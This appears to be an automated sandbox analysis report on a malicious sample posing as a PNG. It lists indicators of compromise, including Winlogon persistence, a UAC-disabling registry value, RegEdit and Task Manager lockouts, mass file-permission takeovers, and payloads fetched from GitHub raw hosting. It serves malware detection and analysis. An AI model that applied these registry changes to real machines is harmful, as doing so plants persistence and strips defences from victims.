00fc2d0b3152bee4dad6eaf80a44fad44194993c9624fc1f72e818af3c89433c

Analysis

max time kernel
677s
max time network
686s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
15-09-2024 14:46

Sharing

Copy URL

Twitter E-mail

Reason

Machine shutdown

Report Analysis Logs

General

Target

PFP-240-Glass.png
Size

308KB
MD5

d7ff5d334efd48bdb0aea4d3eb3b25f4
SHA1

3ee560de2a2087edf97d3068eec68118365fe18d
SHA256

00fc2d0b3152bee4dad6eaf80a44fad44194993c9624fc1f72e818af3c89433c
SHA512

2daa1bb15c67ab3bb029c1299bc278281110c535b9362242df563993a3936a1b4e3d9df39509cc6ce2eecaf2d148c2b85e923465f634c2497f096891967ee27d
SSDEEP

6144:6pJwAc13Qf6YtAvtJZnCsJXNFNDHgnQR7xX8eEFQ3oYpO5ujT20i5O+VesL:WmAR6YtAfZC09FNsnUSxQ3gwbi5O+wE

Score

10^/10

microsoft defense_evasion discovery evasion exploit persistence phishing privilege_escalation trojan

Malware Config

Signatures

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "explorer.exe, wscript.exe \"C:\\Program Files\\mrsmajor\\Launcher.vbs\""	wscript.exe

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	wscript.exe

Boot or Logon Autostart Execution: Active Setup 2 TTPs 5 IoCs

Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.

persistence

Active Setup

T1547.014

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Active Setup\Installed Components	explorer.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	tv_enua.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	MSAGENT.EXE
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	INSTALLER.exe
Key created	\REGISTRY\MACHINE\software\WOW6432Node\microsoft\Active Setup\Installed Components	INSTALLER.exe

Disables RegEdit via registry modification 1 IoCs

evasion

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Policies\system\disableregistrytools = "1"	wscript.exe

Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Event Triggered Execution: AppInit DLLs 1 TTPs
Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.
persistence privilege_escalation

AppInit DLLs
T1546.010

Possible privilege escalation attempt 64 IoCs

exploit

pid	Process
3980	icacls.exe
1496	takeown.exe
5136	takeown.exe
4428	icacls.exe
5788	icacls.exe
5344	icacls.exe
2384	icacls.exe
5936	icacls.exe
5596	icacls.exe
4876	takeown.exe
3720	icacls.exe
5400	icacls.exe
2820	takeown.exe
1696	icacls.exe
5780	takeown.exe
2668	takeown.exe
5140	takeown.exe
1608	takeown.exe
1424	icacls.exe
4268	takeown.exe
5748	icacls.exe
5868	icacls.exe
5076	takeown.exe
5820	icacls.exe
4612	icacls.exe
2964	takeown.exe
5580	icacls.exe
1660	icacls.exe
5724	icacls.exe
5852	takeown.exe
1108	takeown.exe
3488	icacls.exe
824	takeown.exe
4660	takeown.exe
3008	icacls.exe
2784	icacls.exe
4692	icacls.exe
1608	takeown.exe
5948	takeown.exe
5028	icacls.exe
5244	takeown.exe
1608	takeown.exe
96	icacls.exe
4832	takeown.exe
6028	icacls.exe
6064	takeown.exe
5952	takeown.exe
5860	icacls.exe
4604	takeown.exe
2960	icacls.exe
4592	takeown.exe
4292	icacls.exe
3720	takeown.exe
2980	icacls.exe
5824	takeown.exe
6024	takeown.exe
5936	icacls.exe
5648	icacls.exe
6052	icacls.exe
6120	takeown.exe
4660	icacls.exe
5152	takeown.exe
5944	icacls.exe
5340	icacls.exe

Executes dropped EXE 11 IoCs

pid	Process
3032	MSAGENT.EXE
1420	tv_enua.exe
5548	AgentSvr.exe
4380	BonziBDY_4.EXE
5164	AgentSvr.exe
5968	Bonzify.exe
6056	INSTALLER.exe
3316	AgentSvr.exe
4436	INSTALLER.exe
2240	AgentSvr.exe
2328	BossDaMajor.exe

Loads dropped DLL 53 IoCs

pid	Process
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1288	BonziBuddy432.exe
1420	tv_enua.exe
4500	regsvr32.exe
4500	regsvr32.exe
4272	regsvr32.exe
3032	MSAGENT.EXE
5388	regsvr32.exe
5432	regsvr32.exe
5448	regsvr32.exe
5476	regsvr32.exe
5492	regsvr32.exe
5508	regsvr32.exe
5524	regsvr32.exe
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
5164	AgentSvr.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
5164	AgentSvr.exe
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
4380	BonziBDY_4.EXE
6056	INSTALLER.exe
2968	regsvr32.exe
1100	regsvr32.exe
3908	regsvr32.exe
4340	regsvr32.exe
876	regsvr32.exe
996	regsvr32.exe
920	regsvr32.exe
4436	INSTALLER.exe
2816	regsvr32.exe
2816	regsvr32.exe
6068	regsvr32.exe
5968	Bonzify.exe
2240	AgentSvr.exe
2240	AgentSvr.exe
2240	AgentSvr.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1600	icacls.exe
952	icacls.exe
5440	takeown.exe
5860	icacls.exe
4660	icacls.exe
2208	takeown.exe
1040	takeown.exe
4640	takeown.exe
1604	icacls.exe
4944	icacls.exe
5256	takeown.exe
3000	icacls.exe
3896	icacls.exe
4428	icacls.exe
1948	icacls.exe
400	icacls.exe
1364	takeown.exe
412	icacls.exe
4660	takeown.exe
3756	icacls.exe
5596	icacls.exe
1848	takeown.exe
4840	icacls.exe
3008	icacls.exe
1492	takeown.exe
4084	takeown.exe
5780	takeown.exe
3036	takeown.exe
2964	takeown.exe
5476	icacls.exe
5200	icacls.exe
32	takeown.exe
3840	takeown.exe
1560	takeown.exe
5520	takeown.exe
5992	icacls.exe
2796	takeown.exe
2152	icacls.exe
4896	takeown.exe
5344	icacls.exe
2032	takeown.exe
3464	icacls.exe
4996	icacls.exe
5524	takeown.exe
4020	takeown.exe
4624	takeown.exe
4632	takeown.exe
1536	icacls.exe
2176	icacls.exe
5948	takeown.exe
1780	icacls.exe
3600	icacls.exe
4552	takeown.exe
2456	takeown.exe
3948	icacls.exe
4200	takeown.exe
2180	icacls.exe
5680	takeown.exe
2144	takeown.exe
2040	takeown.exe
1684	takeown.exe
2784	icacls.exe
5240	takeown.exe
6088	takeown.exe

Modifies system executable filetype association 2 TTPs 2 IoCs

persistence

Modify Registry

T1112

Change Default File Association

T1546.001

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon\ = "C:\\Program Files\\mrsmajor\\Icon_resource\\SkullIco.ico"	wscript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\exefile\DefaultIcon	wscript.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\tv_enua = "RunDll32 advpack.dll,LaunchINFSection C:\\Windows\\INF\\tv_enua.inf, RemoveCabinet"	INSTALLER.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\tv_enua = "RunDll32 advpack.dll,LaunchINFSection C:\\Windows\\INF\\tv_enua.inf, RemoveCabinet"	tv_enua.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Enumerates connected drives 3 TTPs 25 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\F:	explorer.exe
File opened (read-only)	\??\G:	unregmp2.exe
File opened (read-only)	\??\H:	unregmp2.exe
File opened (read-only)	\??\K:	unregmp2.exe
File opened (read-only)	\??\P:	unregmp2.exe
File opened (read-only)	\??\M:	unregmp2.exe
File opened (read-only)	\??\O:	unregmp2.exe
File opened (read-only)	\??\T:	unregmp2.exe
File opened (read-only)	\??\A:	unregmp2.exe
File opened (read-only)	\??\E:	unregmp2.exe
File opened (read-only)	\??\V:	unregmp2.exe
File opened (read-only)	\??\W:	unregmp2.exe
File opened (read-only)	\??\X:	unregmp2.exe
File opened (read-only)	\??\Z:	unregmp2.exe
File opened (read-only)	\??\J:	unregmp2.exe
File opened (read-only)	\??\I:	unregmp2.exe
File opened (read-only)	\??\Q:	unregmp2.exe
File opened (read-only)	\??\D:	explorer.exe
File opened (read-only)	\??\L:	unregmp2.exe
File opened (read-only)	\??\R:	unregmp2.exe
File opened (read-only)	\??\S:	unregmp2.exe
File opened (read-only)	\??\U:	unregmp2.exe
File opened (read-only)	\??\Y:	unregmp2.exe
File opened (read-only)	\??\B:	unregmp2.exe
File opened (read-only)	\??\N:	unregmp2.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
211	raw.githubusercontent.com
212	raw.githubusercontent.com
213	raw.githubusercontent.com
214	raw.githubusercontent.com
331	raw.githubusercontent.com

Network Share Discovery 1 TTPs
Attempt to gather information on host network.
discovery

Network Share Discovery
T1135
Detected potential entity reuse from brand microsoft.
phishing microsoft

Drops file in System32 directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\SET7A09.tmp	tv_enua.exe
File created	C:\Windows\SysWOW64\SET7A09.tmp	tv_enua.exe
File opened for modification	C:\Windows\SysWOW64\msvcp50.dll	tv_enua.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page17.htm	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\msvbvm60.dll	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page3.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page18.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\MSCOMCTL.OCX	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page16.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\AutoShortcutsMaker.vbs	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\ManualShortcutsMaker.vbs	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page0.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb004.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb011.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page2.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\BBReader.EXE	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\SSubTmr6.dll	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\t3.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page8.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page8.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Snd2.wav	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXE	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb009.gif	BonziBuddy432.exe
File created	C:\Program Files\mrsmajor\MrsMjrGuiLauncher.bat	wscript.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page11.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp002.gif	BonziBuddy432.exe
File created	C:\Program Files (x86)\BonziBuddy432\t3.nbd-SR	BonziBDY_4.EXE
File created	C:\Program Files\mrsmajor\default.txt	wscript.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\BG\Bg2.bmp	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Runtimes\Readme.txt	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page10.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page15.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\J001.nbd-SR	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\test.vbs	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb014.gif	BonziBuddy432.exe
File created	C:\Program Files\mrsmajor\def_resource\@Tile@@.jpg	wscript.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\emsmtp.dll	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\RACREG32.DLL	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page5.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page3.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\t2.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page3.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\sp004.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page2.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\page15.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\~GLH0046.TMP	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page5.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Options\ManualDirPatcher.bat	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb002.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page12.jpg	BonziBuddy432.exe
File created	C:\Program Files\mrsmajor\CPUUsage.vbs	wscript.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page11.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\T001.nbd-SR	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\t001.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Alpha-net\page13.jpg	BonziBuddy432.exe
File created	C:\Program Files\mrsmajor\def_resource\Skullcur.cur	wscript.exe
File created	C:\Program Files\mrsmajor\reStart.vbs	wscript.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Reg.nbd	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Regicon.ocx	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Polizoof\Thumbs.db	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb012.gif	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\page13.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonzi and the Internet\page9.jpg	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\BonziBDY_2.EXE	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\SSCALB32.OCX	BonziBuddy432.exe
File opened for modification	C:\Program Files (x86)\BonziBuddy432\Books\Bonz and the Treasure Chest\cb006.gif	BonziBuddy432.exe

Drops file in Windows directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Windows\msagent\SET7FE7.tmp	MSAGENT.EXE
File created	C:\Windows\INF\SET7FE8.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\help\Agt0409.hlp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET7FC0.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentCtl.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\intl\SETD088.tmp	INSTALLER.exe
File opened for modification	C:\Windows\msagent\SETD05F.tmp	INSTALLER.exe
File created	C:\Windows\help\SETD087.tmp	INSTALLER.exe
File opened for modification	C:\Windows\msagent\AgentDp2.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET7FFB.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentSR.dll	INSTALLER.exe
File opened for modification	C:\Windows\lhsp\tv\SETD242.tmp	INSTALLER.exe
File created	C:\Windows\msagent\SET7FC0.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET7FD2.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\INF\SET7FE8.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SETD073.tmp	INSTALLER.exe
File opened for modification	C:\Windows\help\SETD087.tmp	INSTALLER.exe
File opened for modification	C:\Windows\lhsp\tv\tv_enua.dll	INSTALLER.exe
File opened for modification	C:\Windows\lhsp\tv\tvenuax.dll	INSTALLER.exe
File opened for modification	C:\Windows\lhsp\tv\tvenuax.dll	tv_enua.exe
File opened for modification	C:\Windows\INF\SET79F8.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\SETD071.tmp	INSTALLER.exe
File created	C:\Windows\msagent\chars\Bonzi.acs	Bonzify.exe
File created	C:\Windows\msagent\SETD070.tmp	INSTALLER.exe
File created	C:\Windows\lhsp\tv\SET79E4.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgtCtl15.tlb	MSAGENT.EXE
File opened for modification	C:\Windows\INF\agtinst.inf	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\intl\SET7FFA.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\fonts\SETD264.tmp	INSTALLER.exe
File opened for modification	C:\Windows\msagent\AgentDPv.dll	MSAGENT.EXE
File created	C:\Windows\INF\SETD085.tmp	INSTALLER.exe
File opened for modification	C:\Windows\help\SET7FEA.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentCtl.dll	INSTALLER.exe
File opened for modification	C:\Windows\msagent\AgentPsh.dll	INSTALLER.exe
File opened for modification	C:\Windows\INF\agtinst.inf	INSTALLER.exe
File opened for modification	C:\Windows\msagent\intl\Agt0409.dll	INSTALLER.exe
File created	C:\Windows\INF\SET79F8.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgentAnm.dll	MSAGENT.EXE
File created	C:\Windows\msagent\SET7FD1.tmp	MSAGENT.EXE
File created	C:\Windows\executables.bin	Bonzify.exe
File opened for modification	C:\Windows\msagent\mslwvtts.dll	INSTALLER.exe
File opened for modification	C:\Windows\lhsp\tv\SETD253.tmp	INSTALLER.exe
File created	C:\Windows\msagent\SETD05E.tmp	INSTALLER.exe
File opened for modification	C:\Windows\msagent\AgentDPv.dll	INSTALLER.exe
File created	C:\Windows\INF\SETD265.tmp	INSTALLER.exe
File created	C:\Windows\msagent\SET7FE6.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\lhsp\help\tv_enua.hlp	INSTALLER.exe
File created	C:\Windows\lhsp\tv\SET79E5.tmp	tv_enua.exe
File opened for modification	C:\Windows\msagent\AgentDp2.dll	INSTALLER.exe
File opened for modification	C:\Windows\msagent\AgentMPx.dll	INSTALLER.exe
File created	C:\Windows\lhsp\tv\SETD253.tmp	INSTALLER.exe
File created	C:\Windows\msagent\intl\SET7FFA.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\intl\Agt0409.dll	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SET7FE4.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\AgentMPx.dll	MSAGENT.EXE
File created	C:\Windows\msagent\SET7FFB.tmp	MSAGENT.EXE
File created	C:\Windows\msagent\SETD060.tmp	INSTALLER.exe
File opened for modification	C:\Windows\msagent\SETD086.tmp	INSTALLER.exe
File opened for modification	C:\Windows\lhsp\tv\SET79E4.tmp	tv_enua.exe
File opened for modification	C:\Windows\INF\tv_enua.inf	tv_enua.exe
File created	C:\Windows\help\SET7FEA.tmp	MSAGENT.EXE
File opened for modification	C:\Windows\msagent\SETD060.tmp	INSTALLER.exe
File opened for modification	C:\Windows\msagent\AgentAnm.dll	INSTALLER.exe
File opened for modification	C:\Windows\lhsp\tv\tv_enua.dll	tv_enua.exe

Subvert Trust Controls: Mark-of-the-Web Bypass 1 TTPs 2 IoCs

When files are downloaded from the Internet, they are tagged with a hidden NTFS Alternate Data Stream (ADS) named Zone.Identifier with a specific value known as the MOTW.

defense_evasion

SIP and Trust Provider Hijacking

T1553.003

description	ioc	Process
File created	C:\Users\Admin\Downloads\Bonzify.exe:Zone.Identifier	firefox.exe
File created	C:\Users\Admin\Downloads\BossDaMajor.exe:Zone.Identifier	firefox.exe

Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs

defense_evasion privilege_escalation

Create Process with Token

T1134.002

pid	Process
3320	wscript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Event Triggered Execution: Accessibility Features 1 TTPs
Windows contains accessibility features that may be used by adversaries to establish persistence and/or elevate privileges.
persistence privilege_escalation

Accessibility Features
T1546.008

Program crash 34 IoCs

pid	pid_target	Process	procid_target
5616	4988	WerFault.exe	1089
412	2144	WerFault.exe	1100
6080	5956	WerFault.exe	1106
6136	1528	WerFault.exe	1111
5000	3180	WerFault.exe	1116
5600	316	WerFault.exe	1125
5480	5252	WerFault.exe	1130
5348	4428	WerFault.exe	1140
5904	5348	WerFault.exe	1141
3352	1108	WerFault.exe	1151
5588	5960	WerFault.exe	1156
3348	3604	WerFault.exe	1161
3476	5140	WerFault.exe	1166
5924	5456	WerFault.exe	1175
4552	212	WerFault.exe	1180
2196	2924	WerFault.exe	1185
6008	6120	WerFault.exe	1190
5860	4924	WerFault.exe	1195
6064	1744	WerFault.exe	1200
1128	3492	WerFault.exe	1205
3712	4944	WerFault.exe	1210
1404	3684	WerFault.exe	1215
5172	5272	WerFault.exe	1220
3672	3720	WerFault.exe	1225
5472	4604	WerFault.exe	1230
5840	5816	WerFault.exe	1235
6024	5804	WerFault.exe	1244
4068	4808	WerFault.exe	1249
5560	2040	WerFault.exe	1254
356	6120	WerFault.exe	1273
4528	1696	WerFault.exe	1280
4264	5708	WerFault.exe	1285
5876	4264	WerFault.exe	1286
2676	4532	WerFault.exe	1293

System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	AgentSvr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icacls.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	regsvr32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	takeown.exe
